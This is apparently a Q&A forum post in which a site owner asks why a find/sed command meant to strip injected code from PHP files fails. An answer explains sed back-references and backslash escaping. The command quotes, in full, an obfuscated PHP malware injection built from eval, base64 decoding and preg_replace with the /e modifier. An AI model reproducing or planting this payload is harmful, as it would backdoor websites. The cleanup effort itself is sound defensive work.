# Linux search and replace a complex string

Tags: linux, replace, sed

i am using this command but get an error

```
find ./ -iname \*.php\* -exec sed -i 's#<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\\144\x6f\\154\x70\\170\x65";$eva1tYldakBcVSir = "\x73\\164\x72\\162\x65\\166";$eva1tYldakBoVS1r = "\x65\\143\x61\\154\x70\\145\x72\\137\x67\\145\x72\\160";$eva1tYidokBoVSjr = "\x3b\\51\x29\\135\x31\\133\x72\\152\x53\\126\x63\\102\x6b\\141\x64\\151\x59\\164\x31\\141\x76\\145\x24\\50\x65\\144\x6f\\143\x65\\144\x5f\\64\x36\\145\x73\\141\x62\\50\x6c\\141\x76\\145\x40\\72\x65\\166\x61\\154\x28\\42\x5c\\61\x22\\51\x3b\\72\x40\\50\x2e\\53\x29\\100\x69\\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\\164\x72\x65\\143\x72\\160\\164\x72";$eva1tYlbakBcVSir = "\x67\\141\x6f\\133\x70\\170\x65";$eva1tYldakBoVS1r = "\x65\\143\x72\\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>##g' {} \;
```

sed: -e expression #1, char 8779: Invalid back reference

Any help would be great.

Thanks

Answer (score 3):

When using `sed`, you can use back references - marked with `\N`, where N is a number. E.g. `\1` is the first back reference. E.g. try this:

```
$ echo "\143"|sed 's/\143/abc/'
sed: -e expression #1, char 11: Invalid back reference
```

This is to make it possible to match what has been matched already, e.g.:

```
$ echo 'abcdab'|sed -r 's/(ab)cd\1/x/'
x
```

where `(ab)cd\1` means match `ab` as the first group, then `cd` and then `\1` match whatever the first group matched (`ab` in this case). So e.g. this won't match:

```
$ echo 'abcdaa'|sed -r 's/(ab)cd\1/x/'
abcdaa
```

To make it work, just escape the `\`:

```
$ echo "\143"|sed 's/\\143/abc/'
abc
```

So basically in your string, just replace all `\N` to `\\N` and it should work.

Of course, you made a backup before doing anything on a live Web site, yes?